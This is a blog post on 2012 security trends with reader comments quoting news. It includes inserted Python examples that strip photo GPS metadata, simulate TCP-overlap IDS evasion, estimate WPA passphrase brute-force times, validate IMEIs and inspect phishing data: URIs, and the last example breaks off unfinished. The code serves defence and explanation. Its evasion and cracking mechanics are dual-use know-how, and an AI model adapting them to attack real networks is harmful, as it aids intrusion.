Security trends for 2012

Here is my collection of security trends for 2012 from different sources:

Windows XP will be the biggest security threat in 2012 according to Sean Sullivan, security advisor at F-Secure: “People seem to be adding new systems without necessarily abandoning their old XP machines, which is great news for online criminals, as XP continues to be their favourite target.”

F-Secure also says that it might not be long before cyber criminals turn their attention to tablet devices. Attacks against mobile devices have become more common, and I expect this to continue this year as well.

Americans more susceptible to online scams than believed, study finds. A recent survey from The Ponemon Institute and PC Tools dives into this question and reveals a real gap between how aware Americans think they are of scams and how likely they actually are to fall for them.

Fake antivirus scams have plagued Windows and Mac OS X during the last couple of years, and now it seems that such scams have spread to Android. Nearly all new mobile malware in Q3 2011 targeted Android. When antivirus software becomes a universally accepted requirement (the way it is on Windows), has the platform failed and missed the whole point of being a mobile operating system?


Cyber criminals are developing more sophisticated attacks and the police will counterattack.

Mobile phone surveillance will increase and more details of it will surface. Last year’s findings included location data collecting smartphones, Carrier IQ phone spying busted and a police surveillance system to monitor mobile phones. In the USA the Patriot Act lets the authorities investigate anything, anywhere, without a warrant. Now they are on your devices and can monitor everything. Leaked Memo Says Apple Provides Backdoor To Governments: “in exchange for the Indian market presence” mobile device manufacturers, including RIM, Nokia, and Apple (collectively defined in the document as “RINOA”) have agreed to provide backdoor access on their devices.

Geo-location tagging in smartphones to potentially cause major security risks article says that geo-location tagging security issues are likely to be a major issue in 2012, and that many users of smartphones are unaware of the potentially serious security consequences of their use of the technology. When smartphone images are uploaded to the Internet (to portals such as Facebook or Flickr) there’s a strong chance the GPS location data will be uploaded as well. This information could subsequently be misused by third parties.
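To make the risk concrete, here is an added example (written for this page, not code from the article quoted above) that reads the GPS tags out of a JPEG’s Exif block and strips the block before an image is shared, using only Python’s standard library. The sample image is constructed inside the code (a minimal JPEG holding just an Exif segment with made-up Helsinki-area coordinates), so it runs offline; real files carry a full image after the metadata, which the same segment walk handles because it stops at the scan data.

```python
"""Find and strip GPS coordinates from JPEG Exif metadata using only the standard library."""
import struct

SOI, EOI, SOS, APP1 = 0xFFD8, 0xFFD9, 0xFFDA, 0xFFE1
TAG_GPS_IFD = 0x8825                      # IFD0 entry pointing at the GPS sub-IFD
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004


def segments(jpeg: bytes):
    """Yield (marker, payload, start, end) for each marker segment that precedes the scan data."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(jpeg):
        (marker,) = struct.unpack(">H", jpeg[pos:pos + 2])
        if marker in (SOS, EOI):          # entropy-coded image data follows SOS; no more metadata segments
            return
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        yield marker, jpeg[pos + 4:pos + 2 + length], pos, pos + 2 + length
        pos += 2 + length


def read_ifd(tiff: bytes, offset: int, bo: str) -> dict:
    """Parse one TIFF IFD into {tag: (type, count, 4 raw value/offset bytes)}."""
    (n,) = struct.unpack(bo + "H", tiff[offset:offset + 2])
    entries = {}
    for i in range(n):
        e = offset + 2 + 12 * i
        tag, typ, count = struct.unpack(bo + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, count, tiff[e + 8:e + 12])
    return entries


def read_rationals(tiff: bytes, raw: bytes, count: int, bo: str):
    """RATIONAL values never fit the 4-byte slot, so `raw` holds an offset to count*(numerator, denominator)."""
    (off,) = struct.unpack(bo + "I", raw)
    vals = struct.unpack(bo + "II" * count, tiff[off:off + 8 * count])
    return [vals[i] / vals[i + 1] for i in range(0, 2 * count, 2)]


def extract_gps(jpeg: bytes):
    """Return (latitude, longitude) in decimal degrees if the Exif block carries GPS tags, else None."""
    for marker, payload, _, _ in segments(jpeg):
        if marker != APP1 or not payload.startswith(b"Exif\x00\x00"):
            continue
        tiff = payload[6:]
        bo = "<" if tiff[:2] == b"II" else ">"        # Exif allows either byte order
        (ifd0,) = struct.unpack(bo + "I", tiff[4:8])
        gps_entry = read_ifd(tiff, ifd0, bo).get(TAG_GPS_IFD)
        if gps_entry is None:
            return None
        (gps_off,) = struct.unpack(bo + "I", gps_entry[2])
        gps = read_ifd(tiff, gps_off, bo)
        if not all(t in gps for t in (GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON)):
            return None
        d, m, s = read_rationals(tiff, gps[GPS_LAT][2], 3, bo)
        lat = d + m / 60 + s / 3600
        d, m, s = read_rationals(tiff, gps[GPS_LON][2], 3, bo)
        lon = d + m / 60 + s / 3600
        if gps[GPS_LAT_REF][2][:1] == b"S":
            lat = -lat
        if gps[GPS_LON_REF][2][:1] == b"W":
            lon = -lon
        return lat, lon
    return None


def strip_exif(jpeg: bytes) -> bytes:
    """Copy of the JPEG with every Exif APP1 segment removed; the image data itself is untouched."""
    out = bytearray(jpeg)
    for marker, payload, start, end in reversed(list(segments(jpeg))):
        if marker == APP1 and payload.startswith(b"Exif\x00\x00"):
            del out[start:end]
    return bytes(out)


def build_sample_jpeg(lat=(60, 10, 15.0), lon=(24, 56, 15.0), refs=("N", "E")) -> bytes:
    """Constructed minimal JPEG (SOI, Exif APP1, EOI) whose little-endian TIFF holds only a GPS sub-IFD."""
    def rational3(dms):
        return b"".join(struct.pack("<II", int(v * 10), 10) for v in dms)
    ifd0 = struct.pack("<H", 1) + struct.pack("<HHII", TAG_GPS_IFD, 4, 1, 26) + struct.pack("<I", 0)
    gps = struct.pack("<H", 4)                                     # GPS IFD starts at offset 26
    gps += struct.pack("<HHI", GPS_LAT_REF, 2, 2) + refs[0].encode() + b"\x00\x00\x00"
    gps += struct.pack("<HHII", GPS_LAT, 5, 3, 80)                 # 3 RATIONALs stored at offset 80
    gps += struct.pack("<HHI", GPS_LON_REF, 2, 2) + refs[1].encode() + b"\x00\x00\x00"
    gps += struct.pack("<HHII", GPS_LON, 5, 3, 104)                # next 3 RATIONALs at offset 104
    gps += struct.pack("<I", 0) + rational3(lat) + rational3(lon)
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd0 + gps
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + struct.pack(">HH", APP1, len(app1) + 2) + app1 + b"\xff\xd9"
```

Stripping the whole Exif segment rather than just the GPS tags is the safer default for an upload filter: camera serial numbers and thumbnails live in the same block and leak almost as much.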

You need to find your balance between freedom and security (Vapauden ja turvallisuuden tasapaino). Usernames are poured out for all to see; passwords and personal identification numbers are published. Knowledge of access management is therefore even more important: who has the right to know what, when and where, and in which role? Access, identity and role management are essential for the protection of the whole system. Implementation of such systems is still far from complete.

When designing networked services, security should be taken into account at the planning stage rather than at the end of implementation. Even a secure network and information system cannot operate in a vacuum.


The reliability of server certificates will face more and more problems. We can expect more certificate authority bankruptcies due to cyber attacks against them. Certificate attacks that have focused on PC web browsers are now proven to be effective against mobile browsers as well.

Stonesoft says that advanced evasion techniques (AET) will be a major threat. Stonesoft discovered that with certain evasion techniques (particularly when combined in specific ways) they could sneak common exploits past many IDS/IPS systems (including their own, at the time last summer). Using the right tool set (including a custom TCP/IP stack) attackers could sneak past our best defenses. This is real, and they foresee a not too distant future where things like botnet kits will have this as a checkbox feature.
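The core of many such evasions is ambiguity: when two TCP segments overlap with different bytes, operating systems differ on which copy they keep, so a sensor that applies the wrong policy reassembles a different stream than the target host sees. The following Python script is an added example (not Stonesoft’s tool and not code from the original post) that simulates both policies on a constructed capture and, more usefully for a defender, flags conflicting overlaps, which a legitimate retransmission never produces. The request strings and signature are made up for illustration.

```python
"""Simulate TCP stream reassembly under two overlap policies and flag conflicting overlaps."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    seq: int      # sequence number of the first byte
    data: bytes


def reassemble(segments, policy: str) -> bytes:
    """Stream as seen by a host that keeps the first ('first') or the last ('last') copy of an overlapped byte.

    Segments are processed in arrival order; gaps (missing segments) are simply skipped here.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}
    for seg in segments:
        for i, byte in enumerate(seg.data):
            pos = seg.seq + i
            if policy == "last" or pos not in stream:
                stream[pos] = byte
    return bytes(stream[pos] for pos in sorted(stream))


def conflicting_overlaps(segments):
    """Sequence positions for which two segments supplied different bytes.

    Real retransmissions repeat the same data, so any conflict is worth an alert on its own.
    """
    seen, conflicts = {}, set()
    for seg in segments:
        for i, byte in enumerate(seg.data):
            pos = seg.seq + i
            if pos in seen and seen[pos] != byte:
                conflicts.add(pos)
            seen.setdefault(pos, byte)
    return sorted(conflicts)


def inspect_stream(segments, signature: bytes) -> dict:
    """What a sensor with a fixed policy would match, and whether the stream is ambiguous at all."""
    first = reassemble(segments, "first")
    last = reassemble(segments, "last")
    conflicts = conflicting_overlaps(segments)
    return {
        "match_first": signature in first,
        "match_last": signature in last,
        "ambiguous": bool(conflicts),
        "conflict_positions": conflicts,
    }


def sample_segments():
    """Constructed capture: a harmless request followed by an overlapping retransmission with different bytes."""
    return [
        Segment(1000, b"GET /public HTTP/1.0"),
        Segment(1005, b"secret"),   # overlaps bytes 1005..1010 with conflicting content
    ]


if __name__ == "__main__":
    print(inspect_stream(sample_segments(), b"/secret"))
```

A sensor that normalises to the "first" policy never sees the signature here while a "last"-policy host does; target-based reassembly (knowing the destination’s policy) or simply alerting on any conflicting overlap closes that gap regardless of which exploit is being smuggled.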

Rise of Printer Malware is real. Printer malware: print a malicious document, expose your whole LAN says that sending a printer a document that carries a malicious version of the printer’s OS (its firmware) can result in your sensitive documents being sent anywhere on the Internet. Researchers at Columbia University have discovered a new class of security flaws that could allow hackers to remotely control printers over the Internet. Potential scenario: send a resume to HR, wait for them to print it, take over the network and pwn the company. HP does have firmware update software for its printers, and HP Refutes Inaccurate Claims; Clarifies on Printer Security. I wonder how many more years until that old chain letter, where some new insidious virus infects everything from your graphics card to your monitor cable, becomes true.

Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations. How Do You Protect PCs from BIOS Attacks? The U.S. National Institute of Standards and Technology (NIST) has drafted a new computer-security publication that provides guidance for computer manufacturers, suppliers, and security professionals who must protect personal computers as they start up “out of the box”: “BIOS Integrity Measurement Guidelines,” NIST Special Publication 800-155.

According to Stonesoft, security problems threaten lives, and 2012 may be the first year in which lives are lost because of security attacks. Whether this happens remains to be seen, the company says, but the risk comes from attacks on industrial SCADA systems at targets such as hospitals or automated drug delivery systems. I already posted about a month ago about SCADA system security issues.

849 Comments

  1. Tomi says:

    The Finnish Communications Regulatory Authority’s Cert-Fi site calls for the removal of Java software from browsers.

    Today’s release of Java 7 has a serious security hole, with no fix available. This is a very serious risk, because cyber criminals spread a variety of malware and Trojans via the vulnerability.

    Experts at Cert-Fi and the data security company F-Secure go as far as advising to remove Java completely.

    One option is to use two browsers, one of which has Java removed, and use it for general browsing. The Java-equipped browser can be used on trusted websites where it is necessary. For example, some online banks use Java.

    Source: http://www.iltalehti.fi/digi/2012082816011191_du.shtml

  2. Tomi Engdahl says:

    Air Force Openly Seeking Cyberweapons
    http://it.slashdot.org/story/12/08/28/2059216/air-force-openly-seeking-cyberweapons

    “The Air Force Life Cycle Management Center posted a broad agency announcement (PDF) recently, calling on contractors to submit concept papers detailing technological demonstrations of ‘cyberspace warfare operations’ capabilities”

  3. Tomi Engdahl says:

    ‘Degrade, Disrupt, Deceive’: U.S. Talks Openly About Hacking Foes
    http://www.wired.com/dangerroom/2012/08/degrade-disrupt-deceive/

    There was a time, not all that long ago, when the U.S. military wouldn’t even whisper about its plans to hack into opponents’ networks. Now America’s armed forces can’t stop talking about it.

    The latest example comes from the U.S. Air Force, which last week announced its interest in methods “to destroy, deny, degrade, disrupt, deceive, corrupt, or usurp the adversaries [sic] ability to use the cyberspace domain for his advantage.” But that’s only one item in a long list of “Cyberspace Warfare Operations Capabilities” that the Air Force would like to possess. The service, in its request for proposals, also asked for the “ability to control cyberspace effects at specified times and places,” as well as the “denial of service on cyberspace resources, current/future operating systems, and network devices.”

    The Air Force says it will spend $10 million on the effort, mostly for short programs of three to 12 months; the service wants its Trojans and worms available, ASAP.

    These digital weapons could even be deployed before a battle begins. The Air Force notes that it would like to deploy “technologies/capabilities” that leave “the adversary entering conflicts in a degraded state.”

  4. Tomi Engdahl says:

    Hack on Saudi Aramco hit 30,000 workstations, oil firm admits
    First hacktivist-style assault to use malware?
    http://www.theregister.co.uk/2012/08/29/saudi_aramco_malware_attack_analysis/

    Saudi Aramco said that it had put its network back online on Saturday, 10 days after a malware attack floored 30,000 workstations at the oil giant.

    In a statement, Saudi Arabia’s national oil firm said that it had “restored all its main internal network services” hit by a malware outbreak that struck on 15 August. The firm said its core business of oil production and exploration was not affected by the attack.

    Oil and production systems were run off “isolated network systems unaffected by the attack”, which the firm has pledged to investigate.

    A previously unknown group called Cutting Sword of Justice claimed responsibility for the attack.

    The group said it hacked Aramco after compromising systems in “several countries” before implanting malware to “destroy 30,000 computers” within Aramco’s network.

    Neither victim nor perpetrator named the malware that featured in the attack, but security researchers implicated the Shamoon malware in the security breach.

    According to researchers, the malware also has the capacity to extract information from compromised systems before uploading it to the internet.

    Core router names and admin passwords along with email address and supposed password of Saudi Aramco chief exec, Khalid A Al-Falih, were uploaded to Pastebin on Monday. The latest leak may be a result of the threatened follow-up attack, due to take place last weekend, rather than the fruits of the original malware-fuelled assault.

    “In the past, hacktivists have typically used application or distributed denial of service (DDoS) attacks -”

    “Hacktivists rarely use malware, if other hacktivists jump on this trend it could become very dangerous,”

  5. Tomi Engdahl says:

    How I cracked my neighbor’s WiFi password without breaking a sweat
    http://arstechnica.com/security/2012/08/wireless-password-easily-cracked/

    Readily available tools make cracking easier.

    Last week’s feature explaining why passwords are under assault like never before touched a nerve with many Ars readers, and with good reason. After all, passwords are the keys that secure Web-based bank accounts, sensitive e-mail services, and virtually every other facet of our online life. Lose control of the wrong password and it may only be a matter of time until the rest of our digital assets fall, too.

    Take, for example, the hundreds of millions of WiFi networks in use all over the world. If they’re like the ones within range of my office, most of them are protected by the WiFi Protected Access or WiFi Protected Access 2 security protocols. In theory, these protections prevent hackers and other unauthorized people from accessing wireless networks or even viewing traffic sent over them, but only when end users choose strong passwords.

    WPA and WPA2 passwords require a minimum of eight characters

    That’s not to say wireless password cracks can’t be accomplished with ease, as I learned firsthand.

    Such brute-force attacks are possible, but in the best of worlds they require at least six days to exhaust all the possibilities when using Amazon’s EC2 cloud computing service. WPA’s use of a highly iterated implementation of the PBKDF2 function makes such cracks even harder.

    Yes, the gains made by crackers over the past decade mean that passwords are under assault like never before.

    When done right, it’s not hard to pick a passcode that will take weeks, months, or years to crack.

    With odds like that, crackers are likely to move onto easier targets, say one that relies on the quickly guessed “secretpassword” or a well-known Shakespearean quote for its security.

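
As an added illustration of the point made in the article above (example code written for this page, not from Ars Technica or the article’s author), the script below derives a WPA/WPA2 pairwise master key exactly as IEEE 802.11i specifies it (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output), times how many derivations one CPU core manages with Python’s standard library, and turns that into worst-case exhaustive-search times for a few passphrase policies. The policies in `policy_report` are assumptions chosen for illustration.

```python
"""Derive a WPA/WPA2 PMK as 802.11i does and estimate how long exhausting a passphrase policy would take."""
import hashlib
import time

WPA_ITERATIONS = 4096  # PBKDF2-HMAC-SHA1 iteration count fixed by IEEE 802.11i
PMK_LEN = 32           # 256-bit pairwise master key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), exactly as the standard specifies."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), WPA_ITERATIONS, PMK_LEN)


def measure_derivations_per_second(samples: int = 25) -> float:
    """Time a handful of derivations on this machine (single core, pure stdlib)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"benchmark-{i}", "benchmark-ssid")   # constructed inputs, only the timing matters
    return samples / (time.perf_counter() - start)


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of distinct passphrases of `length` symbols drawn from an alphabet of `alphabet_size`."""
    return alphabet_size ** length


def exhaustive_search_seconds(alphabet_size: int, length: int, rate_per_second: float) -> float:
    """Worst-case time to try every passphrase in the keyspace at the given derivation rate."""
    return keyspace_size(alphabet_size, length) / rate_per_second


def policy_report(rate_per_second: float) -> dict:
    """Worst-case search time in days for a few assumed passphrase policies at the given rate."""
    policies = {
        "8 digits": (10, 8),
        "8 lowercase letters": (26, 8),
        "8 mixed-case letters and digits": (62, 8),
        "12 mixed-case letters and digits": (62, 12),
        "20 lowercase letters (diceware-style passphrase)": (26, 20),
    }
    return {name: exhaustive_search_seconds(a, n, rate_per_second) / 86400
            for name, (a, n) in policies.items()}


if __name__ == "__main__":
    rate = measure_derivations_per_second()
    print(f"{rate:,.0f} PBKDF2 derivations/s on this machine (one core)")
    for name, days in policy_report(rate).items():
        print(f"{name:50s} {days:,.1f} days")
```

The rate measured here is a single-core interpreter figure; GPU rigs and cloud clusters like the EC2 setup the article mentions are orders of magnitude faster, so scale the days column accordingly. The comparison survives the scaling: an all-digit 8-character key is exhausted within a day even at a few thousand derivations per second, while a long random passphrase stays out of reach at any realistic rate. The IEEE 802.11i test vector (passphrase “password”, SSID “IEEE”) is a convenient check that the derivation is the standard one.
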
  6. Tomi Engdahl says:

    Toyota says it was hacked by ex-IT contractor, sensitive information stolen
    http://nakedsecurity.sophos.com/2012/08/29/toyota-says-it-was-hacked-by-ex-it-contractor-sensitive-information-stolen/

    Toyota has accused an IT contractor that the car manufacturer fired just last week of breaking into its computer systems, and stealing sensitive information including trade secrets.

    Within hours of his dismissal, Shahulhameed is said to have logged into the toyotasupplier.com website without authorisation, and spent hours downloading proprietary plans for parts, designs and pricing information.

    What isn’t clear, at this time, is whether Toyota are claiming that Shahulhameed accessed their computer systems by exploiting a vulnerability or whether they had simply not reset staff passwords that he may have had access to in his position as an IT contractor with the firm.

    The details in the Toyota case are currently unclear. But regardless of that, it’s a timely reminder to all businesses to remember the importance of reviewing who has access to your systems, and to underline that changing passwords and resetting access rights is essential when a member of staff leaves the company.

  7. Tomi Engdahl says:

    Big Brother on a budget: How Internet surveillance got so cheap
    http://arstechnica.com/information-technology/2012/08/big-brother-meets-big-data-the-next-wave-in-net-surveillance-tech/

    Deep packet inspection, petabyte-scale analytics create a “CCTV for networks.”

    The tech is already helping organizations fight the ever-rising threat of hacker attacks and malware. The organizers of the London Olympic games, in an effort to prevent hackers and terrorists from using the games’ information technology for their own ends, undertook one of the most sweeping cyber-surveillance efforts ever conducted privately. In addition to the thousands of surveillance cameras that cover London, there was a massive computer security effort in the Games’ Security Operation Centers, with systems monitoring everything from network infrastructure down to point-of-sale systems and electronic door locks.

    The logs from those systems generated petabytes of data before the torch was extinguished. They were processed in real-time by a security information and event management (SIEM) system using “big data” analytics to look for patterns that might indicate a threat—and triggering alarms swiftly when such a threat was found.

    The combination of the sophisticated analytics and massive data storage in big data systems with DPI network security technology has created what Dr. Elan Amir, CEO of Bivio Networks, calls “a security camera for your network.”

    “There’s no question that within the next three to five years, not having a copy of your network data will be as strange as not having a firewall,” Amir told me.

  8. Tomi Engdahl says:

    Every mobile phone has a unique 15-digit IMEI number, which has played an important role in criminal investigations.

    Counterfeit mobile codes have started to make a mess of criminal investigations. Criminals have started to forge IMEI codes in Finland, MTV3 reported on Wednesday.

    At least on some of Nokia’s and Samsung’s old basic phones, the IMEI code can be changed with a PC application. Instructions for this are published on the internet.

    According to MTV3’s information, altered IMEI codes have already led to complete bystanders becoming suspects in criminal investigations.

    DNA’s production director Antti Jokinen says that pirated phones with the same IMEI codes have been made in Asia. Jokinen estimated that in some countries there may be thousands of phones with the same codes.

    Operators assert, however, that the problem is “marginal” in Finland.

    Source: http://www.3t.fi/artikkeli/uutiset/teknologia/vaarennetyt_kannykkakoodit_sotkevat_rikostutkintaa

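
To show what can and cannot be checked about an IMEI, here is an added example (not from the MTV3 report or the comment above) in Python: it validates the Luhn check digit that closes every 15-digit IMEI, and then scans a constructed connection log for one IMEI appearing under several subscribers. The check digit only catches typing errors; a cloned or rewritten IMEI with a correct check digit passes it, which is exactly why the duplicate scan is the useful part. The log records are made up (the first IMEI is the widely used documentation example 490154203237518, the IMSIs are invented).

```python
"""Validate IMEI check digits (Luhn) and flag IMEIs shared by several subscribers in a connection log."""
from collections import defaultdict


def luhn_check_digit(digits: str) -> int:
    """Check digit that makes `digits` + check pass the Luhn test (IMEI: Luhn over the first 14 digits)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 0:          # rightmost of the 14 digits is doubled once the check digit is appended
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def is_valid_imei(imei: str) -> bool:
    """True if `imei` is 15 digits and its last digit is the Luhn check digit of the first 14."""
    imei = imei.replace(" ", "").replace("-", "")
    return len(imei) == 15 and imei.isdigit() and luhn_check_digit(imei[:14]) == int(imei[14])


def tac(imei: str) -> str:
    """Type Allocation Code: the first 8 digits, identifying the phone model, not the individual handset."""
    return imei[:8]


def shared_imeis(records):
    """Group log records by IMEI and return those seen with more than one subscriber (IMSI)."""
    subscribers = defaultdict(set)
    for rec in records:
        subscribers[rec["imei"]].add(rec["imsi"])
    return {imei: sorted(s) for imei, s in subscribers.items() if len(s) > 1}


def audit(records):
    """Return (invalid_imeis, shared) so an investigator sees which handset identities cannot be trusted."""
    invalid = sorted({r["imei"] for r in records if not is_valid_imei(r["imei"])})
    return invalid, shared_imeis(records)


# Constructed sample records; the IMSIs are invented and the cell ids are arbitrary labels.
SAMPLE_RECORDS = [
    {"imsi": "244120000000001", "imei": "490154203237518", "cell": "A1"},
    {"imsi": "244120000000002", "imei": "490154203237518", "cell": "B7"},  # same IMEI, other subscriber
    {"imsi": "244120000000003", "imei": "490154203237518", "cell": "C3"},  # and a third one
    {"imsi": "244120000000004", "imei": "490154203237519", "cell": "A1"},  # check digit wrong: edited by hand?
    {"imsi": "244120000000005", "imei": "356938035643809", "cell": "D2"},  # valid, unique
]


if __name__ == "__main__":
    invalid, shared = audit(SAMPLE_RECORDS)
    print("invalid check digit:", invalid)
    for imei, imsis in shared.items():
        print(f"IMEI {imei} (TAC {tac(imei)}) seen with {len(imsis)} subscribers: {imsis}")
```

Thousands of handsets sharing one IMEI, as the comment describes, show up as a single entry with a long subscriber list; a handset whose IMEI fails the check digit was almost certainly altered by software that did not bother to recompute it.
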
  9. Tomi Engdahl says:

    Oracle rushes out patch for critical 0-day Java exploit
    ‘Everything’s fine now, please don’t delete us’
    http://www.theregister.co.uk/2012/08/30/oracle_issues_java_0day_patch/

    In an uncommon break with its thrice-annual security update schedule, Oracle has released a patch for three Java 7 security flaws that have recently been targeted by web-based exploits.

    “Due to the high severity of these vulnerabilities, Oracle recommends that customers apply this Security Alert as soon as possible,” Eric Maurice, the company’s director of software security assurance, said in a blog post published on Thursday.

    Maurice said that the vulnerabilities patched only affect Java running in browsers, and not standalone desktop Java applications or Java running on servers.

    According to Maurice, Java users who run Windows can use the Java Automatic Update feature to get the latest, patched version, which is officially dubbed Java SE 7 Update 7.

  10. Tomi Engdahl says:

    Twitter replaces smuggled video as terrorists’ preferred way to communicate
    http://www.kansascity.com/2012/08/30/3786934/twitter-replaces-smuggled-video.html

    For years, Islamist extremists have struggled to outsmart the censors in online forums – with their videos yanked from YouTube, their pages flagged on Facebook and their message boards hacked – but Twitter still offers a rare unfiltered space for the groups, according to analysts who monitor militants’ online presence.

    “On Twitter, they get more reach to expand their propaganda. They can reach the ‘swing people,’ and try to attract more sympathizers,”

    “The Taliban was in a Twitter fight with the ISAF’s Twitter account on a number of occasions,”

    “There’s not a lot to be gained from taking it down,” McCants said. “The fear is: ‘Oh my God, they’re on Twitter, how far could their propaganda reach?’ Once you calm down, you see that the only people who get excited about it are geeky intel analysts and fans they already have.”

  11. Tomi Engdahl says:

    US congress wants a word with ZTE, Huawei
    Considers laws to deal with national security threat posed by Chinese kit
    http://www.theregister.co.uk/2012/09/03/huaweu_zte_in_us_spotlight/

    China’s dominant telco vendors ZTE Corp and Huawei will take part in US congressional hearings next month regarding investigations of alleged Chinese spy threats to US telecommunications infrastructure.

    investigating allegations of close ties between the Chinese government and both Huawei and ZTE

    Australian and New Zealand government officials have also been part of the panel’s investigations looking into how the vendors operate in foreign markets, according to Rogers.

    Earlier this year in Australia, Huawei was excluded from bidding for any National Broadband Network contracts due to concerns over national security issues.

  12. Tomi Engdahl says:

    Calculating the Cost of Full Disk Encryption
    http://it.slashdot.org/story/12/09/03/0321205/calculating-the-cost-of-full-disk-encryption

    ‘After doing all of the math, Ponemon found that the cost of FDE on laptop and desktop computers in the U.S. per year was $235, while the cost savings from reduced data breach exposure was $4,650.’

    Calculating the Cost of Full Disk Encryption
    http://www.networkcomputing.com/security/calculating-the-cost-of-full-disk-encryp/240006508

    Is full disk encryption (FDE) worth it? A recent study conducted by the Ponemon Institute shows that the expected benefits of FDE exceed cost by a factor ranging from four to 20, based on a reduction in the probability that data will be compromised as the result of the loss or theft of a digital device.

    “Encryption is important to mitigating the damage caused by data breaches, complying with privacy and data protection regulations, and preserving brand and reputation,” states the report.

    “In order to make rational decisions regarding the optimum use of encryption, it is important to comprehend the total cost of ownership (TCO). This particularly applies to solutions believed to be free but may have significantly higher TCO than commercial products.”

    The study found that the most expensive element of FDE is not the hardware or software involved, but the value of user time it takes to start up, shut down and hibernate computing systems while using FDE. Also adding to the cost is the time it takes technicians to complete full disk encryption procedures.

    reasons organizations choose to encrypt laptop and desktop computers in the first place

    32%: self-regulatory programs
    30%: national data protection laws
    25%: Minimizing exposure resulting from lost computers
    23%: Avoiding harm to customers resulting from data loss
    20%: Improving security posture
    18%: Minimizing the cost of a data breach
    17%: Complying with vendor/business partner agreements
    10%: Minimizing the effect of cyberattacks

    “Regardless of which approach to data protection is taken, all companies should be doing something to mitigate this risk.”

    Brink adds that any type of encryption should be integrated with existing processes, including identity management and helpdesk processes, backup and recovery, patch management and end-user training.

    Is full disk encryption (FDE) worth it?
    The report, “The TCO for Full Disk Encryption,”
    http://www.winmagic.com/ponemonstudy

    Endpoint Security: Hardware Roots of Trust
    http://www.aberdeen.com/Aberdeen-Library/7080/RA-trusted-computing-security.aspx

  13. Tomi Engdahl says:

    iLOQ – The Key to Security
    https://www.youtube.com/watch?v=IQCyw6lUWyk

    The patented award winning iLOQ locking system offers advanced security and convenient access management for master-key locking environments.

    See a ILOQ C10S Lock Get Broken into in Under a Minute
    https://www.youtube.com/watch?v=1KS7nbHIRcY

    Finland’s ILOQ C10S is a high-end lock.

    This lock was recently rendered ineffective, since it can be broken into with nothing more than a screwdriver.

    iLoq is very small company while Abloy is the “big brother”.

    How To Pick Any Lock (easy)
    https://www.youtube.com/watch?v=FCxT_a1kyy4&feature=fvwrel

  14. Tomi Engdahl says:

    Firefox, Opera allow crooks to hide an entire phish site in a link
    Watch out for the tinyurl that isn’t
    http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/

    A shortcoming in browsers including Firefox and Opera allows crooks to easily hide an entire malicious web page in a clickable link – ideal for fooling victims into handing over passwords and other sensitive info.

    the malicious web pages can be stored in data URIs – uniform resource identifiers, not to be confused with URLs – which stuff the web code into a handy string that when clicked on, instructs the browser to unpack the payload and present it as a page.

    It negates the need to find somewhere to secrete your malicious page, and once shortened using a service such as TinyURL, the URI can be reduced to a small URL perfect for passing around social networks, online chats and email. Crooks would still need to set up a server to receive data from victims, however.

    URI trick can sidestep traditional scam defences, such as web filtering. Data URIs may also contain a potentially malicious Java applet, a major concern following last week’s Java-related security flap, a post on Sophos’s Naked Security blog notes.

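
To show what a link filter can do with this trick, here is an added example (not code from The Register or Sophos) in Python: it decodes a data: URI as RFC 2397 defines it, reports whether the payload is an HTML document, whether it contains a password field, which external hosts its forms post to, and whether it embeds active content (script, applet, object or embed tags), and then flags the link. The phishing page it inspects is constructed inline; the reserved name collector.invalid stands in for the crook’s collection server, and the heuristics are my own choices rather than anyone’s product logic.

```python
"""Inspect a link and flag data: URIs that carry a whole HTML document, as described above."""
import base64
import re
import urllib.parse


def decode_data_uri(uri: str):
    """Return (media_type, payload_bytes) for a data: URI (RFC 2397), or None for any other scheme."""
    if uri[:5].lower() != "data:":
        return None
    header, sep, body = uri[5:].partition(",")
    if not sep:
        return None
    params = header.split(";")
    media_type = (params[0] or "text/plain").lower()   # RFC 2397 default when the type is omitted
    if "base64" in (p.lower() for p in params[1:]):
        body = body + "=" * (-len(body) % 4)           # tolerate stripped padding
        payload = base64.b64decode(body)
    else:
        payload = urllib.parse.unquote_to_bytes(body)
    return media_type, payload


def assess_link(uri: str):
    """Classify a data: URI; None means it is an ordinary URL and this check does not apply."""
    decoded = decode_data_uri(uri)
    if decoded is None:
        return None
    media_type, payload = decoded
    looks_html = (media_type in ("text/html", "application/xhtml+xml")
                  or re.search(rb"<html|<form|<script", payload, re.I) is not None)
    form_targets = []
    for action in re.findall(rb"""<form[^>]*\baction\s*=\s*["']?([^"'\s>]+)""", payload, re.I):
        host = urllib.parse.urlparse(action.decode("ascii", "replace")).hostname
        if host:                                       # only absolute targets matter in a data: page
            form_targets.append(host)
    active = {m.decode("ascii").lower()
              for m in re.findall(rb"<(script|applet|object|embed)\b", payload, re.I)}
    return {
        "media_type": media_type,
        "html_document": looks_html,
        "password_field": re.search(rb"""type\s*=\s*["']?password""", payload, re.I) is not None,
        "form_targets": form_targets,
        "active_content": sorted(active),
    }


def is_suspicious(report) -> bool:
    """A data: URI that renders HTML and either collects credentials or embeds active content."""
    return bool(report) and report["html_document"] and (
        report["password_field"] or bool(report["form_targets"]) or bool(report["active_content"]))


# Constructed sample: a fake login page packed into a data: URI. collector.invalid is a reserved name.
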